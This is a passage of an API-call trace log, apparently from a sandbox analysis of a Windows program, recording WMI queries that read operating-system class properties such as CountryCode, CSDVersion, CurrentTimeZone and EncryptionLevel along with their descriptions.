CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1 [0050.661] SafeArrayGetElement (in: psa=0x233e128bed0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.661] IUnknown:Release (This=0x233e12e4f20) returned 0x1 [0050.661] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.662] SysStringLen (param_1="CodeSet") returned 0x7 [0050.662] SysStringLen (param_1="BuildNumber") returned 0xb [0050.662] SysStringLen (param_1="CodeSet") returned 0x7 [0050.662] SysStringLen (param_1="BuildType") returned 0x9 [0050.662] SysStringLen (param_1="BuildType") returned 0x9 [0050.662] SysStringLen (param_1="CodeSet") returned 0x7 [0050.662] IUnknown:Release (This=0x233e12d2b60) returned 0x1 [0050.662] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.662] IWbemClassObject:Get (in: This=0x233e12d3160, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290ba8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.663] IWbemClassObject:Get (in: This=0x233e12d3160, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12912f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.663] GetCurrentThreadId () returned 0xdf0 [0050.663] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.663] IWbemClassObject:Get (in: This=0x233e12d3160, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CountryCode property indicates the code for the country/regionused by the operating system. Values are based on international phone dialing prefixes (also referred to as IBM country/region codes). The CountryCode string can use up to six characters to define the country/region code value./nExample: 1 for the United States)", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.663] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.663] lstrlenA (lpString="") returned 0 [0050.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.663] SysStringLen (param_1="The CountryCode property indicates the code for the country/regionused by the operating system. Values are based on international phone dialing prefixes (also referred to as IBM country/region codes). The CountryCode string can use up to six characters to define the country/region code value./nExample: 1 for the United States)") returned 0x148 [0050.663] SysStringLen (param_1="") returned 0x0 [0050.663] GetCurrentThreadId () returned 0xdf0 [0050.663] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.664] IWbemClassObject:Get (in: This=0x233e12d3160, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.664] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.664] SysStringLen (param_1="CountryCode") returned 0xb [0050.664] SysStringLen (param_1="BuildNumber") returned 0xb [0050.664] SysStringLen (param_1="CountryCode") returned 0xb [0050.664] SysStringLen (param_1="BuildType") returned 0x9 [0050.664] SysStringLen (param_1="CountryCode") returned 0xb [0050.664] SysStringLen (param_1="CodeSet") returned 0x7 [0050.664] SysStringLen (param_1="CodeSet") returned 0x7 [0050.664] SysStringLen (param_1="CountryCode") returned 0xb [0050.664] IUnknown:Release (This=0x233e12d3160) returned 0x1 [0050.664] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.665] IWbemClassObject:Get (in: This=0x233e12d3780, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291088, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.665] IWbemClassObject:Get (in: This=0x233e12d3780, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291028, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.665] GetCurrentThreadId () returned 0xdf0 [0050.665] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.665] IWbemClassObject:Get (in: This=0x233e12d3780, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CSDVersion property contains a null-terminated string, that indicates the latest Service Pack installed on the computer system. If no Service Pack is installed, the string is NULL. For computer systems running Windows 95, this property contains a null-terminated string that provides arbitrary additional information about the operating system./nExample: Service Pack 3.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.665] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.666] lstrlenA (lpString="") returned 0 [0050.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.666] SysStringLen (param_1="The CSDVersion property contains a null-terminated string, that indicates the latest Service Pack installed on the computer system. If no Service Pack is installed, the string is NULL. For computer systems running Windows 95, this property contains a null-terminated string that provides arbitrary additional information about the operating system./nExample: Service Pack 3.") returned 0x176 [0050.666] SysStringLen (param_1="") returned 0x0 [0050.666] GetCurrentThreadId () returned 0xdf0 [0050.666] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.666] IWbemClassObject:Get (in: This=0x233e12d3780, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.666] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.667] SysStringLen (param_1="CSDVersion") returned 0xa [0050.667] SysStringLen (param_1="BuildNumber") returned 0xb [0050.667] SysStringLen (param_1="CSDVersion") returned 0xa [0050.667] SysStringLen (param_1="CodeSet") returned 0x7 [0050.667] SysStringLen (param_1="CSDVersion") returned 0xa [0050.667] SysStringLen (param_1="BuildType") returned 0x9 [0050.667] SysStringLen (param_1="BuildType") returned 0x9 [0050.667] SysStringLen (param_1="CSDVersion") returned 0xa [0050.667] IUnknown:Release (This=0x233e12d3780) returned 0x1 [0050.667] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.667] IWbemClassObject:Get (in: This=0x233e12d3a30, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290e18, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.668] IWbemClassObject:Get (in: This=0x233e12d3a30, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290bd8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.668] GetCurrentThreadId () returned 0xdf0 [0050.668] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.668] IWbemClassObject:Get (in: This=0x233e12d3a30, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.668] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.668] lstrlenA (lpString="") returned 0 [0050.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.669] GetCurrentThreadId () returned 0xdf0 [0050.669] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.669] IWbemClassObject:Get (in: This=0x233e12d3a30, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.669] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.669] SysStringLen (param_1="CSName") returned 0x6 [0050.669] SysStringLen (param_1="BuildNumber") returned 0xb [0050.669] SysStringLen (param_1="CSName") returned 0x6 [0050.669] SysStringLen (param_1="CodeSet") returned 0x7 [0050.669] SysStringLen (param_1="CSName") returned 0x6 [0050.669] SysStringLen (param_1="BuildType") returned 0x9 [0050.669] SysStringLen (param_1="CSName") returned 0x6 [0050.669] SysStringLen (param_1="CSDVersion") returned 0xa [0050.669] SysStringLen (param_1="CSDVersion") returned 0xa [0050.669] SysStringLen (param_1="CSName") returned 0x6 [0050.670] IUnknown:Release (This=0x233e12d3a30) returned 0x1 [0050.670] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.670] IWbemClassObject:Get (in: This=0x233e12d3f80, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291148, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.670] IWbemClassObject:Get (in: This=0x233e12d3f80, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290c08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.670] GetCurrentThreadId () returned 0xdf0 [0050.670] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.671] IWbemClassObject:Get (in: This=0x233e12d3f80, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone indicates the number of minutes the operating system is offset from Greenwich Mean Time. Either the number is positive, negative or zero.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.671] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.671] lstrlenA (lpString="") returned 0 [0050.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.671] SysStringLen (param_1="CurrentTimeZone indicates the number of minutes the operating system is offset from Greenwich Mean Time. Either the number is positive, negative or zero.") returned 0x99 [0050.671] SysStringLen (param_1="") returned 0x0 [0050.671] GetCurrentThreadId () returned 0xdf0 [0050.671] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.671] IWbemClassObject:Get (in: This=0x233e12d3f80, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.671] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.672] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.672] SysStringLen (param_1="BuildNumber") returned 0xb [0050.672] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.672] SysStringLen (param_1="CodeSet") returned 0x7 [0050.672] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.672] SysStringLen (param_1="CountryCode") returned 0xb [0050.672] SysStringLen (param_1="CountryCode") returned 0xb [0050.672] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.672] IUnknown:Release (This=0x233e12d3f80) returned 0x1 [0050.672] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.673] IWbemClassObject:Get (in: This=0x233e12d6170, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e127ef48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.673] IWbemClassObject:Get (in: This=0x233e12d6170, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128c348, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.673] GetCurrentThreadId () returned 0xdf0 [0050.673] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.673] IWbemClassObject:Get (in: This=0x233e12d6170, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Debug property indicates whether the operating system is a checked (debug) build. Checked builds provide error checking, argument verification, and system debugging code. Additional code in a checked binary generates a kernel debugger error message and breaks into the debugger. This helps immediately determine the cause and location of the error. Performance suffers in the checked build due to the additional code that is executed./nValues: TRUE or FALSE, A value of TRUE indicates the debugging version of User.exe is installed.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.673] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.674] lstrlenA (lpString="") returned 0 [0050.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc110, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.674] SysStringLen (param_1="The Debug property indicates whether the operating system is a checked (debug) build. Checked builds provide error checking, argument verification, and system debugging code. Additional code in a checked binary generates a kernel debugger error message and breaks into the debugger. This helps immediately determine the cause and location of the error. Performance suffers in the checked build due to the additional code that is executed./nValues: TRUE or FALSE, A value of TRUE indicates the debugging version of User.exe is installed.") returned 0x219 [0050.674] SysStringLen (param_1="") returned 0x0 [0050.674] GetCurrentThreadId () returned 0xdf0 [0050.674] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.674] IWbemClassObject:Get (in: This=0x233e12d6170, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.674] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.675] SysStringLen (param_1="Debug") returned 0x5 [0050.675] SysStringLen (param_1="BuildNumber") returned 0xb [0050.675] SysStringLen (param_1="Debug") returned 0x5 [0050.675] SysStringLen (param_1="CodeSet") returned 0x7 [0050.675] SysStringLen (param_1="Debug") returned 0x5 [0050.675] SysStringLen (param_1="CountryCode") returned 0xb [0050.675] SysStringLen (param_1="Debug") returned 0x5 [0050.675] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.675] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.675] SysStringLen (param_1="Debug") returned 0x5 [0050.675] IUnknown:Release (This=0x233e12d6170) returned 0x1 [0050.675] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.675] IWbemClassObject:Get (in: This=0x233e12d5ec0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290cc8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.676] IWbemClassObject:Get (in: This=0x233e12d5ec0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290c38, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.676] GetCurrentThreadId () returned 0xdf0 [0050.676] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.676] IWbemClassObject:Get (in: This=0x233e12d5ec0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Description property provides a description of the Windows operating system. Some user interfaces (those that allow editing of this description) limit its length to 48 characters.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.676] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.680] lstrlenA (lpString="") returned 0 [0050.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.680] SysStringLen (param_1="The Description property provides a description of the Windows operating system. Some user interfaces (those that allow editing of this description) limit its length to 48 characters.") returned 0xb7 [0050.680] SysStringLen (param_1="") returned 0x0 [0050.680] GetCurrentThreadId () returned 0xdf0 [0050.680] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.681] IWbemClassObject:Get (in: This=0x233e12d5ec0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.681] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.681] SysStringLen (param_1="Description") returned 0xb [0050.681] SysStringLen (param_1="BuildNumber") returned 0xb [0050.681] SysStringLen (param_1="Description") returned 0xb [0050.681] SysStringLen (param_1="CodeSet") returned 0x7 [0050.681] SysStringLen (param_1="Description") returned 0xb [0050.681] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.681] SysStringLen (param_1="Description") returned 0xb [0050.681] SysStringLen (param_1="Debug") returned 0x5 [0050.681] SysStringLen (param_1="Debug") returned 0x5 [0050.681] SysStringLen (param_1="Description") returned 0xb [0050.682] IUnknown:Release (This=0x233e12d5ec0) returned 0x1 [0050.682] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.682] IWbemClassObject:Get (in: This=0x233e12d5400, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290e48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.682] IWbemClassObject:Get (in: This=0x233e12d5400, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291238, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.682] GetCurrentThreadId () returned 0xdf0 [0050.682] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.682] IWbemClassObject:Get (in: This=0x233e12d5400, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Boolean indicating whether the operating system is distributed across several computer system nodes. If so, these nodes should be grouped as a cluster.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.683] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.683] lstrlenA (lpString="") returned 0 [0050.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.683] SysStringLen (param_1="Boolean indicating whether the operating system is distributed across several computer system nodes. If so, these nodes should be grouped as a cluster.") returned 0x97 [0050.683] SysStringLen (param_1="") returned 0x0 [0050.683] GetCurrentThreadId () returned 0xdf0 [0050.683] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.683] IWbemClassObject:Get (in: This=0x233e12d5400, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.683] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.684] SysStringLen (param_1="Distributed") returned 0xb [0050.684] SysStringLen (param_1="CodeSet") returned 0x7 [0050.684] SysStringLen (param_1="Distributed") returned 0xb [0050.684] SysStringLen (param_1="CurrentTimeZone") returned 0xf [0050.684] SysStringLen (param_1="Distributed") returned 0xb [0050.684] SysStringLen (param_1="Debug") returned 0x5 [0050.684] SysStringLen (param_1="Distributed") returned 0xb [0050.684] SysStringLen (param_1="Description") returned 0xb [0050.684] SysStringLen (param_1="Description") returned 0xb [0050.684] SysStringLen (param_1="Distributed") returned 0xb [0050.684] IUnknown:Release (This=0x233e12d5400) returned 0x1 [0050.684] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.685] IWbemClassObject:Get (in: This=0x233e12d4bf0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290d28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.685] IWbemClassObject:Get (in: This=0x233e12d4bf0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290ff8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.685] GetCurrentThreadId () returned 0xdf0 [0050.685] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.685] IWbemClassObject:Get (in: This=0x233e12d4bf0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The EncryptionLevel property specifies if the encryption level for secure transactions is 40-bit, 128-bit, or n-bit encryption.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.685] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.686] lstrlenA (lpString="") returned 0 [0050.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.686] SysStringLen (param_1="The EncryptionLevel property specifies if the encryption level for secure transactions is 40-bit, 128-bit, or n-bit encryption.") returned 0x7f [0050.686] SysStringLen (param_1="") returned 0x0 [0050.687] GetCurrentThreadId () returned 0xdf0 [0050.687] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.687] IWbemClassObject:Get (in: This=0x233e12d4bf0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bdd0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1271010, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.687] SafeArrayGetLBound (in: psa=0x233e128bdd0, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0 [0050.687] SafeArrayGetUBound (in: psa=0x233e128bdd0, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0 [0050.687] SafeArrayGetElement (in: psa=0x233e128bdd0, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0 [0050.688] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, 